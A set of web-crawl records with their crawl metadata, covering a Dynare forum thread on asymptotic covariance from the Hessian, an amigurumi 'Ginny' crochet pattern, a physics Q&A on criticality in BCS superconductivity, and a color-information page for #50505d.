] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8094646,"math_prob":0.9818855,"size":14479,"snap":"2023-14-2023-23","text_gpt3_token_len":4434,"char_repetition_ratio":0.10404145,"word_repetition_ratio":0.51373184,"special_character_ratio":0.30582222,"punctuation_ratio":0.14825307,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99291474,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T04:51:35Z\",\"WARC-Record-ID\":\"<urn:uuid:a252654b-6a8f-4917-a418-96c8fb22f7c5>\",\"Content-Length\":\"103953\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae0e11eb-e88c-4cc2-b78a-f6fe833ee91a>\",\"WARC-Concurrent-To\":\"<urn:uuid:4c833385-aa71-42af-903d-83d9c765074d>\",\"WARC-IP-Address\":\"172.67.132.66\",\"WARC-Target-URI\":\"https://solvedlib.com/n/2-points-a-drug-x27-concentration-in-a-patient-x27-s-blood,8408817\",\"WARC-Payload-Digest\":\"sha1:ILVL4JZO6TWYJGSI5C6DISFUBSJE4EZF\",\"WARC-Block-Digest\":\"sha1:KCHRPGRNDA34JMWXMN5WL423T63TQJWM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653608.76_warc_CC-MAIN-20230607042751-20230607072751-00753.warc.gz\"}"} |
https://forum.dynare.org/t/how-to-get-asymptotic-covariance-matrix/5759 | [
"# How to get asymptotic covariance matrix\n\nHi,\n\nI want to get an asymptotic covariance at mode.\n\nI know that dynare stores the hessian(hh) in a file called MODEL_FILENAME_mode.mat.\n\nTo get an asymptotic covariance at mode, which way should I do afteropening mode file.mat?\n\n1. inv(hh)\n\n2. inv(-hh)\n\n3. hh\n\n4. what else\n\nDynare uses\n\n``` invhess = inv(hh); stdh = sqrt(diag(invhess)); oo_.posterior.optimization.Variance = invhess; ```\nThe minus is not necessary, because the Hessian was computed on minus the log-likelihood function.\n\nHi\n\nshouldn’t that be\n\ninvhess = inv(hh./T)\n\nwhere T is the sample size?\n\nNope, I was actually wrong and inv(hh) is correct."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8907895,"math_prob":0.9012597,"size":615,"snap":"2023-14-2023-23","text_gpt3_token_len":175,"char_repetition_ratio":0.10801964,"word_repetition_ratio":0.021052632,"special_character_ratio":0.24390244,"punctuation_ratio":0.15748031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9517548,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-24T05:57:04Z\",\"WARC-Record-ID\":\"<urn:uuid:92be2719-fdfb-4a07-b5f8-f38b2dcb917b>\",\"Content-Length\":\"19806\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1424fbd2-c8c0-42d6-9bf9-070d2234068e>\",\"WARC-Concurrent-To\":\"<urn:uuid:7fd1aac9-9e53-4bec-8d6d-c4e4fd862cb7>\",\"WARC-IP-Address\":\"217.70.189.83\",\"WARC-Target-URI\":\"https://forum.dynare.org/t/how-to-get-asymptotic-covariance-matrix/5759\",\"WARC-Payload-Digest\":\"sha1:Z36JCVKTDNS2MB4TRY5GPQZNMBK5AMWH\",\"WARC-Block-Digest\":\"sha1:IBFQFWREY6JSSMM4IALHYTPKLRSLQQ7I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945248.28_warc_CC-MAIN-20230324051147-20230324081147-00568.warc.gz\"}"} |
https://crochetfree.msa.plus/amigurumi-ginny-free-crochet-pattern/ | [
"# Amigurumi Ginny Free Crochet Pattern",
null,
"We continue to bring together the most beautiful amigurumi patterns related to Amigurumi. In this article you are waiting for a of amigurumi ginny pattern.\n\nGinny\n\nLegend\n\nch – chain\n\nsl-st – slip stich\n\nsc – single crochet\n\nhdc – half crochet\n\ndc – double crochet\n\ninc – increase\n\ndec – decrease\n\n3in1 – increase (3 columns in 1 loop of the previous row)\n\n1 of 3 – decrease (from 3 loops of the previous row, connect sc with the common top)\n\nI crocheted 1.3 mm, picked up the threads under the hook, the blue was cotton from the Semenovskaya Yarn company, white, black and yellow were from another manufacturer, a little thinner (not significantly)\n\nIn the process of creation, I was guided by previously drawn projections:\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5. (3 + inc) * 6 = 30\n\n6. (4 + inc) * 6 = 36\n\n7. (5 + inc) * 6 = 42\n\n8. (6 + inc) * 6 = 48\n\n9. (7 + inc) * 6 = 54\n\n10. (8 + inc) * 6 = 60\n\n11. (9 + inc) * 6 = 66\n\n12. (10 + inc) * 6 = 72\n\n13. (11 + inc) * 6 = 78\n\n14. (12 + inc) * 6 = 84\n\n15. (13 + inc) * 6 = 90\n\n16. (14 + inc) * 6 = 96\n\n17. (15 + inc) * 6 = 102\n\n18. (33 + inc * 3 = 105\n\n19.17 + inc + (34 + inc) * 2 + 17 = 108\n\n20-23. = 108 (in the 23rd row, added a marker at the beginning of the row)\n\nHereinafter, about the rows in which to start stuffing, as well as about the density of stuffing, I do not describe, do everything based on the density of the knit product, filler, and the convenience of the knitter\n\n24. Knit on the legs of the columns of the previous row (as if perpendicular to the previous row, the base of the columns should be on the inside of the product), to form a protrusion of the lower jaw\n\n(7 + dec) * 8 + sl-st = 64 (break the thread)\n\n25. Attach the blue thread to the 17th loop from the beginning of the previous row, knit in the usual way\n\n6 + dec + 14 + dec + 8 + sl-st = 30 (break the thread)\n\n26. In this row and further several rows will alternate blue and white thread. I recommend to break off each time and attach another, it was easier for me. Attach the blue thread to the beginning of the row, which is marked with a marker. Knit on the legs of the columns of the previous row (as in the 24th row, only the base of the columns should be on the outside of the product)\n\n7 blue + 46 white + 9 blue\n\nNext, go to knitting in the usual way 36 blue columns (hereinafter – blue thread, b. – white thread)\n\n27.3g. + {(6 + dec) * 2 + 20 + dec + 7 + dec + 6} b. + (11 + dec + 20 + dec + 6) g. = 91\n\n28.3g. + (9 + dec + 10 + dec + 19 + dec + 9) b. + (8 + dec + 20 + dec + 5) y. = 88\n\n29.1 g + (1 + dec + 10 + dec + 23 + dec + 10 + dec + 2) b. + (7 + dec +15 + dec + 7) g. = 82\n\n30. (1 of 3 + 46 + 1 of 3) b. + 31 g. = 79\n\n31. (8 + dec + 28 + dec + 8) b. + (6 + dec + 15 + dec + 6) g. = 75\n\n32. Knit as in the 24th row (to form the protrusion of the lower teeth)\n\n{9 + dec + (2 + dec + [4 + dec] * 3 + 2) hdc + dec + 9} b. +\n\nknit in the usual way + (3 + dec + 3 + dec + 9 + dec + 3 + dec + 3) g. = 65\n\n33. Knit as in the 26th row 40 b. + in the usual way (4 + dec +12 + dec + 4) g. = 62\n\n34.40 b. + 22 g. = 62\n\n35. (1 of 3 + 34 + 1 of 3) b. + 22 g. = 58\n\n36. (dec + 9 + dec + 10 + dec + 9 + dec) b. + 22 g. = 54\n\n37.32 b. + 22 g. = 54\n\n38.10 b. + 12 g. For the front wall + 10 b. +22 g. = 54\n\n39. Knit on the front wall (from now on only blue thread) = 54\n\n40. 
= 54\n\nFurther cheek formation\n\n41.4sc + 2hdc + 1dc + 5v1dc + 1dc + 3hdc + 2sc + 4sl-st +\n\n+ 2sc + 3hdc + 1dc + 5v1dc + 1dc + 2hdc + 4sc + sl-st (break the thread)\n\n42. Start at the usual beginning of the row (where is the marker)\n\n4sc + 2hdc + 7dc + 3hdc + 8sc + 3hdc + 7dc + 2hdc + 4sc + 22sc = 62\n\n43.4sc + 2hdc + 1dc + 1 out of 5dc + 1dc + 3hdc + 2sc + 4sl-st +\n\n+ 2sc + 3hdc + 1dc + 1 out of 5dc + 1dc + 2hdc + 4sc + sl-st\n\n44. Start from the usual beginning of the row (where the marker) = 54sc\n\nCheek formation complete\n\n45. (17 + inc) * 3 = 57\n\n46. (18 + inc) * 3 = 60\n\n47. (19 + inc) * 3 = 63\n\n48. (20 + inc) * 3 = 66 (from the inside of the product make eye braces near the nose)\n\n49. (10 + inc) * 6 = 72 (from the inside of the product make eye braces on the side of the temples)\n\n50. (23 + inc) * 3 = 75\n\n51.1 + inc + 36 + inc + 6 + inc + 21 + inc + 5 = 77\n\n52. inc + 39 + inc + 6 + inc + 22 + inc + 6 = 81\n\n53. 46 + inc + 20 + inc + 10 + inc + 2 = 84 (in this or the next row, repeat the weights as in row 48)\n\n54-55. = 84\n\n56.16 + inc + 1 + inc + 9 + inc + 1 + inc + 53 = 88\n\n57.17 + inc + 1 + inc + 11 + inc + 1 + inc + 54 = 92\n\n58.2 + dec + 54 + dec + 6 + dec + 18 + dec + 4 = 88\n\n59. = 88\n\n60. Make 4 decreases in a row = 84\n\n61. = 84\n\n62. 14sc + 2hdc + 4dc + 2hdc + 9sc + 2hdc + 4dc + 2hdc + 45 = 84 (eyebrow shaping)\n\n63.14 + 4dec + 2 + dec + 1 + dec + 2 + 4dec + 45 = 74\n\n64.14 + 2dec + 1 + dec + 1 + dec + 1 + 2dec + 45 = 68\n\n65. (15 + dec) * 4 = 64\n\n66. (14 + dec) * 4 = 60\n\n67. (8 + dec) * 6 = 54\n\n68. (7 + dec) * 6 = 48\n\n69. (6 + dec) * 6 = 42\n\n70. (5 + dec) * 6 = 36\n\n71. (4 + dec) * 6 = 30\n\n72. (3 + dec) * 6 = 24\n\n73. (2 + dec) * 6 = 18\n\n74. (1 + dec) * 6 = 12\n\n75. 6 decreases, tighten the hole, cut the thread.\n\nDraw a black thread around the perimeter of the mouth. I made a seam\n\nEyes (2 pcs.)\n\n1. Knit with a white thread 6 ch in the ring amigurumi = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5-11 = 24\n\n12. (2 + dec) * 6 = 18\n\n13. (1 + dec ) * 6 = 12\n\n14. 6 decreases, tighten the hole, cut the thread.\n\nDo not stuff. Fold the part in half, on the convex part, make the pupil a black thread. Sew the eye to the orbit around the perimeter of the oval, filling as necessary the space between the eye and the orbit\n\nNose\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2. (1 + inc) * 3 = 9\n\n3. (2 + inc) * 3 = 12\n\n4.5 + 3inc + 4 = 15\n\n5.5sc + 1hdc + 4dc + 1hdc + 4sc = 15\n\n6.5sc + 1hdc + 4dc + 1hdc + 4sc = 15\n\n7.5.5sc + 6hdc + 4sc = 15\n\n8-9. = 15\n\n10.3inc + 4 + 3dec + 2 = 15\n\nCut a long thread, sew the nose to the face\n\nEar (2 pcs.)\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5. (3 + inc) * 6 = 30\n\n6-14. = 30\n\n15. (8 + dec) * 3 = 27\n\n16. = 27\n\n17. (7 + dec) * 3 = 24\n\n18. = 24\n\n19. (6 + dec) * 3 = 21\n\n20-21. = 21\n\n22. (5 + dec) * 3 = 18\n\n23-24. = 18\n\n25. (4 + dec) * 3 = 15\n\n26-27. = 15\n\n28. (3 + dec) * 3 = 12\n\n29-30. = 12\n\n31. (2 + dec) * 3 = 9\n\n32-33. = 9\n\n34. (1 + dec) * 3 = 6\n\n35-36. = 6\n\nOpen the hole, cut the thread. Sew on your ears after a beard (so that the beard starts under the ear)\n\nBeard\n\n1. 
Knit in black thread 13 ch\n\n2.2sc in the 2nd loop from the hook + 7inc + 1sc + inc + 1sc = 20\n\n3.1 ch + 1sc to the root of the last sc of the previous row + 2sc to the base of the last sc of the previous row\n\n4.1 ch, turn, 2 + inc = 4\n\n5.1 ch, turn, inc + 2 + inc = 6\n\n6. 45 ch\n\n7.2 ch, hook in the 3rd loop, 45hdc + 6sc\n\n8.45 ch\n\n9.2 ch, hook in the 3rd loop, 45hdc + sl-st in the base of the 7th row sc\n\nCut a long thread, sew a beard\n\nEarring\n\n1. Knit yellow thread 24 ch\n\n2.1 ch, hook to the 2nd, (3 + inc) * 6 = 30\n\n3.1 ch, turn, 30sc\n\n4.1 ch, turn, (3 + dec) * 6 = 24\n\nIn the resulting strip, sew wide sides together (on which 24 loops). Sew the serge to one ear. Sew the ears to the head (earlobe attached at about the same place where the beginning of the beard was attached)\n\nEyebrow 1 (1 pc.)\n\n1. Knit in black thread 13 ch\n\n2.1 ch + 1sc in the 2nd item + 1hdc + (2dc in 1p.) * 4 + 1dc + 2hdc in 1p. + 2hdc +\n\n+ 2sc in 1p. + 2sc = 19\n\n3.1 ch, turn, behind the front wall 2sc + 1 out of 2 sc + 2hdc + 1 out of 2 hdc + 1dc +\n\n+ (1 of 2 dc) * 4 + 1hdc + 1sc = 13\n\nEyebrow 2 (1 pc.)\n\n1. Black thread, knit 13 ch\n\n2.1 ch + 2sc + 2sc in 1p. + 2hdc + 2hdc in 1p. + 1dc + (2dc in 1p.) * 4 + 1hdc + 1sc = 19\n\n3.1 ch, turn, behind the front wall 1sc + 1hdc + (1 of 2 dc) * 4 + 1dc +\n\n+ 1 out of 2 hdc + 2hdc + 1 out of 2 sc + 2sc = 13\n\nSew both eyebrows to the brow arches of the face\n\nHair\n\n1. Knit with a black thread 6 ch in the amigurumi ring = 6 (then without counting the loops in each circle, just knit the specified number of loops in a spiral, without the beginning / end of the circle)\n\n2. (5 + inc) * 5\n\n3. = 36 sc\n\n4. (2 + inc) * 3\n\n5. = 120 sc\n\n6.3 + 3dec + 3\n\n7. Fold the part in half so that the tail becomes flat, while 3 decreases of the last row should be located in the middle. Fold again so that 3 decreases of the last row are outside (it should turn out as in the picture below). Knit a circle of 6 loops on the outer loops\n\nKnit the second element illogically from 1 to 3 rows, then skip 4 and 5, immediately knit 6 row.\n\nNow put a small part in poplars, put a large part in the resulting hollow (like this: >>). Tie them together on the outer loops (I got 11 loops).\n\nContinue as one, as follows:\n\n1. = 11\n\n2. = 11\n\n3. dec + 3 + dec + 4 = 9\n\n4. = 9\n\n5. dec + 2 + dec + 3 = 7\n\nCut the thread. Sew the inner sides of the elements together so that they do not fall apart.\n\nRinglet on hair\n\n1. Knit with a yellow thread 18 ch, connect into a ring\n\n2.18 sc\n\n3. (1 + dec) * 6 = 12\n\n4. (1 + inc) * 6 = 18\n\nSew together 1 and 4 rows. Sew a ring to the base of the hair (so that it holds tightly to one another). Sew the entire structure to the head\n\nDone:",
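The stitch counts in a pattern like this follow one rule: a round written (k + inc) * 6 consumes 6 groups of k + 1 stitches and produces 6 groups of k + 2, so the round grows by 6. A small checker (a hypothetical helper, not part of the original pattern) that reproduces the head counts from rows 1-17:

```python
# (k + inc) * 6 means 6 repeats of "k single crochet, then 1 increase":
# each repeat consumes k + 1 stitches and produces k + 2.
def next_round(prev, k, n=6):
    assert prev == (k + 1) * n, "repeat must tile the previous round exactly"
    return (k + 2) * n

count = 6            # row 1: 6 ch in the amigurumi ring
count = 2 * count    # row 2: 6 inc -> 12
for k in range(1, 16):          # rows 3-17: (k + inc) * 6
    count = next_round(count, k)
print(count)         # 102, matching row 17 of the head
```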
null,
"Copy Protected by Chetan's WP-Copyprotect."
] | [
null,
"data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",
null,
"data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.78791285,"math_prob":0.9999043,"size":9047,"snap":"2020-45-2020-50","text_gpt3_token_len":3729,"char_repetition_ratio":0.2060157,"word_repetition_ratio":0.20274325,"special_character_ratio":0.48634908,"punctuation_ratio":0.1272217,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.99401253,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T23:16:35Z\",\"WARC-Record-ID\":\"<urn:uuid:8218cf85-b25d-4565-8032-dfa288a136d7>\",\"Content-Length\":\"97441\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b11a156d-4d39-4ff9-a87a-fa2defe9ba39>\",\"WARC-Concurrent-To\":\"<urn:uuid:fbf00031-1aee-48e5-99a0-77fb10e08df8>\",\"WARC-IP-Address\":\"104.28.16.205\",\"WARC-Target-URI\":\"https://crochetfree.msa.plus/amigurumi-ginny-free-crochet-pattern/\",\"WARC-Payload-Digest\":\"sha1:EXIOZNW53BLLQ5TPSMJ2INKJMH3KF6FV\",\"WARC-Block-Digest\":\"sha1:C3OOOYAV4JYST7LFRNPPYKPFN7SBNDVO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107885059.50_warc_CC-MAIN-20201024223210-20201025013210-00684.warc.gz\"}"} |
https://physics.stackexchange.com/questions/220916/criticality-in-bcs-theory/220935#220935 | [
"# Criticality in BCS Theory\n\nCan someone provide me with a pedagogical introduction into the role of criticality in BCS theory?\n\nThe QCD condensate is due to strong coupling. The BCS condensation involves only weak coupling - nevertheless we get a condensate. As far as I know, this can only happen if our model involves criticality. How exactly does the formation of the condensate work, and which parameters play a crucial role?\n\n• I'm not sure exactly what you are asking. But one reason that Cooper pairing is possible with arbitrarily weak attractive interactions is that limiting dynamics to the Fermi surface effectively reduces the dimensionality of the problem. You may enjoy this blog post: thiscondensedlife.wordpress.com/2015/10/27/… Nov 27 '15 at 23:19\n• Thanks a lot for this great link, that illuminates a very interesting and important aspect of BCS theory! Nov 30 '15 at 14:39\n• @Rococo It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:48\n• @MengCheng It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:48\n• @LCF It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:49\n\nBCS theory deals with superconductivity in a metal, or basically a finite density of non-interacting fermions. There is a Fermi surface with tons of gapless particle-hole excitations, so you can say it is critical. As long as the Fermi surface has certain symmetry (time-reversal or inversion), the pairing instability is infinitesimal, meaning that the condensate forms for arbitrarily small attractive interaction.\n\nTo be more concrete, a simplified model which nevertheless captures the essence of the BCS theory is the following:\n\n$H=\\sum_k \\xi_k c_{k}^\\dagger c_k+ g\\sum_{k,k'}c_{k\\uparrow}^\\dagger c_{-k\\downarrow}^\\dagger c_{-k'\\downarrow}c_{k'\\uparrow}$\n\nHere $\\xi_k$ is the single-particle spectrum of the fermions. The transition temperature is given by $T_c\\sim e^{-\\frac{1}{g\\nu}}$, where $\\nu$ is the density of states at Fermi surface.\n\n• In what sense does a Fermi surface with \"tons of gapless particle-hole excitations\" imply criticality? Nov 27 '15 at 23:19\n• OK, I'm not exactly sure what you mean by criticality. It's a gapless system, but not \"critical\" in the same way as Dirac fermions since it has \"more\" gapless excitations and there is a length scale, the Fermi wavelength determined by the fermion density. Nov 27 '15 at 23:33\n• You're not sure what I mean by criticality? I don't understand. You are the one who used that terminology in your answer. What did you mean by it? Nov 28 '15 at 4:23\n• It's a Fermi surface, so whatever you mean by criticality, whether it is the same as my understanding or not, just compare it with what happens with a Fermi surface. Nov 28 '15 at 4:37\n• Thanks for your answer and comments. However, I agree to Rococo's first question and would like to ask Meng Cheng what physical requirements a system needs to fulfill in order to obtain criticality? Nov 30 '15 at 14:41"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8557804,"math_prob":0.8891572,"size":846,"snap":"2021-43-2021-49","text_gpt3_token_len":223,"char_repetition_ratio":0.10332542,"word_repetition_ratio":0.0,"special_character_ratio":0.23286052,"punctuation_ratio":0.084415585,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9753124,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T17:29:53Z\",\"WARC-Record-ID\":\"<urn:uuid:20740a03-cbd0-41d5-938f-7c1646145e70>\",\"Content-Length\":\"176256\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2592a625-fc99-4973-b882-b5780754fa5e>\",\"WARC-Concurrent-To\":\"<urn:uuid:43542019-3051-4b3b-acdd-648f86bd39fe>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/220916/criticality-in-bcs-theory/220935#220935\",\"WARC-Payload-Digest\":\"sha1:2NASMI5NZTW2KHLQWDEZCVKF4G5A3YF4\",\"WARC-Block-Digest\":\"sha1:ZCIX24P6MR4PQ4XYH3W4JQQL4Y3DAOJE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587915.41_warc_CC-MAIN-20211026165817-20211026195817-00695.warc.gz\"}"} |
https://www.colorhexa.com/50505d | [
"# #50505d Color Information\n\nIn a RGB color space, hex #50505d is composed of 31.4% red, 31.4% green and 36.5% blue. Whereas in a CMYK color space, it is composed of 14% cyan, 14% magenta, 0% yellow and 63.5% black. It has a hue angle of 240 degrees, a saturation of 7.5% and a lightness of 33.9%. #50505d color hex could be obtained by blending #a0a0ba with #000000. Closest websafe color is: #666666.\n\n• R 31\n• G 31\n• B 36\nRGB color chart\n• C 14\n• M 14\n• Y 0\n• K 64\nCMYK color chart\n\n#50505d color description : Very dark grayish blue.\n\n# #50505d Color Conversion\n\nThe hexadecimal color #50505d has RGB values of R:80, G:80, B:93 and CMYK values of C:0.14, M:0.14, Y:0, K:0.64. Its decimal value is 5263453.\n\nHex triplet RGB Decimal 50505d `#50505d` 80, 80, 93 `rgb(80,80,93)` 31.4, 31.4, 36.5 `rgb(31.4%,31.4%,36.5%)` 14, 14, 0, 64 240°, 7.5, 33.9 `hsl(240,7.5%,33.9%)` 240°, 14, 36.5 666666 `#666666`\nCIE-LAB 34.464, 2.989, -7.573 8.152, 8.233, 11.515 0.292, 0.295, 8.233 34.464, 8.142, 291.539 34.464, -0.729, -10.074 28.693, 0.502, -3.708 01010000, 01010000, 01011101\n\n# Color Schemes with #50505d\n\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5d50\n``#5d5d50` `rgb(93,93,80)``\nComplementary Color\n• #50575d\n``#50575d` `rgb(80,87,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #57505d\n``#57505d` `rgb(87,80,93)``\nAnalogous Color\n• #575d50\n``#575d50` `rgb(87,93,80)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5750\n``#5d5750` `rgb(93,87,80)``\nSplit Complementary Color\n• #505d50\n``#505d50` `rgb(80,93,80)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5050\n``#5d5050` `rgb(93,80,80)``\n• #505d5d\n``#505d5d` `rgb(80,93,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5050\n``#5d5050` `rgb(93,80,80)``\n• #5d5d50\n``#5d5d50` `rgb(93,93,80)``\n• #2d2d34\n``#2d2d34` `rgb(45,45,52)``\n• #383842\n``#383842` `rgb(56,56,66)``\n• #44444f\n``#44444f` `rgb(68,68,79)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5c5c6b\n``#5c5c6b` `rgb(92,92,107)``\n• #686878\n``#686878` `rgb(104,104,120)``\n• #737386\n``#737386` `rgb(115,115,134)``\nMonochromatic Color\n\n# Alternatives to #50505d\n\nBelow, you can see some colors close to #50505d. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #50535d\n``#50535d` `rgb(80,83,93)``\n• #50525d\n``#50525d` `rgb(80,82,93)``\n• #50515d\n``#50515d` `rgb(80,81,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #51505d\n``#51505d` `rgb(81,80,93)``\n• #52505d\n``#52505d` `rgb(82,80,93)``\n• #53505d\n``#53505d` `rgb(83,80,93)``\nSimilar Colors\n\n# #50505d Preview\n\nThis text has a font color of #50505d.\n\n``<span style=\"color:#50505d;\">Text here</span>``\n#50505d background color\n\nThis paragraph has a background color of #50505d.\n\n``<p style=\"background-color:#50505d;\">Content here</p>``\n#50505d border color\n\nThis element has a border color of #50505d.\n\n``<div style=\"border:1px solid #50505d;\">Content here</div>``\nCSS codes\n``.text {color:#50505d;}``\n``.background {background-color:#50505d;}``\n``.border {border:1px solid #50505d;}``\n\n# Shades and Tints of #50505d\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #070709 is the darkest color, while #fdfdfd is the lightest one.\n\n• #070709\n``#070709` `rgb(7,7,9)``\n• #111113\n``#111113` `rgb(17,17,19)``\n• #1a1a1e\n``#1a1a1e` `rgb(26,26,30)``\n• #232328\n``#232328` `rgb(35,35,40)``\n• #2c2c33\n``#2c2c33` `rgb(44,44,51)``\n• #35353d\n``#35353d` `rgb(53,53,61)``\n• #3e3e48\n``#3e3e48` `rgb(62,62,72)``\n• #474752\n``#474752` `rgb(71,71,82)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #595968\n``#595968` `rgb(89,89,104)``\n• #626272\n``#626272` `rgb(98,98,114)``\n• #6b6b7d\n``#6b6b7d` `rgb(107,107,125)``\n• #747487\n``#747487` `rgb(116,116,135)``\n• #7f7f91\n``#7f7f91` `rgb(127,127,145)``\n• #89899a\n``#89899a` `rgb(137,137,154)``\n• #9494a3\n``#9494a3` `rgb(148,148,163)``\n• #9e9eac\n``#9e9eac` `rgb(158,158,172)``\n• #a9a9b5\n``#a9a9b5` `rgb(169,169,181)``\n• #b3b3be\n``#b3b3be` `rgb(179,179,190)``\n• #bebec7\n``#bebec7` `rgb(190,190,199)``\n• #c8c8d0\n``#c8c8d0` `rgb(200,200,208)``\n• #d3d3d9\n``#d3d3d9` `rgb(211,211,217)``\n• #dddde2\n``#dddde2` `rgb(221,221,226)``\n• #e8e8eb\n``#e8e8eb` `rgb(232,232,235)``\n• #f3f3f4\n``#f3f3f4` `rgb(243,243,244)``\n• #fdfdfd\n``#fdfdfd` `rgb(253,253,253)``\nTint Color Variation\n\n# Tones of #50505d\n\nA tone is produced by adding gray to any pure hue. In this case, #50505d is the less saturated color, while #0000ad is the most saturated one.\n\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #494964\n``#494964` `rgb(73,73,100)``\n• #43436a\n``#43436a` `rgb(67,67,106)``\n• #3c3c71\n``#3c3c71` `rgb(60,60,113)``\n• #353578\n``#353578` `rgb(53,53,120)``\n• #2f2f7e\n``#2f2f7e` `rgb(47,47,126)``\n• #282885\n``#282885` `rgb(40,40,133)``\n• #21218c\n``#21218c` `rgb(33,33,140)``\n• #1b1b92\n``#1b1b92` `rgb(27,27,146)``\n• #141499\n``#141499` `rgb(20,20,153)``\n• #0d0da0\n``#0d0da0` `rgb(13,13,160)``\n• #0707a6\n``#0707a6` `rgb(7,7,166)``\n``#0000ad` `rgb(0,0,173)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #50505d is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
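The conversions listed above are mechanical, so a short sketch can reproduce them. This is not ColorHexa's own code, just the standard hex-to-RGB/CMYK/HSL formulas, checked against the #50505d values stated at the top of the page:

```python
def hex_to_spaces(hex_code: str):
    r, g, b = (int(hex_code.lstrip('#')[i:i + 2], 16) for i in (0, 2, 4))
    rf, gf, bf = r / 255, g / 255, b / 255
    # CMYK: black is the complement of the brightest channel.
    k = 1 - max(rf, gf, bf)
    c, m, y = ((1 - v - k) / (1 - k) if k < 1 else 0 for v in (rf, gf, bf))
    # HSL: lightness is the midpoint of the extreme channels.
    mx, mn = max(rf, gf, bf), min(rf, gf, bf)
    l = (mx + mn) / 2
    d = mx - mn
    s = 0 if d == 0 else d / (1 - abs(2 * l - 1))
    if d == 0:
        h = 0
    elif mx == rf:
        h = 60 * (((gf - bf) / d) % 6)
    elif mx == gf:
        h = 60 * ((bf - rf) / d + 2)
    else:
        h = 60 * ((rf - gf) / d + 4)
    return (r, g, b), (c, m, y, k), (h, s, l)

rgb, cmyk, hsl = hex_to_spaces('#50505d')
print(rgb)                                    # (80, 80, 93)
print([round(100 * v) for v in cmyk])         # [14, 14, 0, 64]
print(round(hsl[0]), round(100 * hsl[1], 1), round(100 * hsl[2], 1))  # 240 7.5 33.9
```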
] | [
null
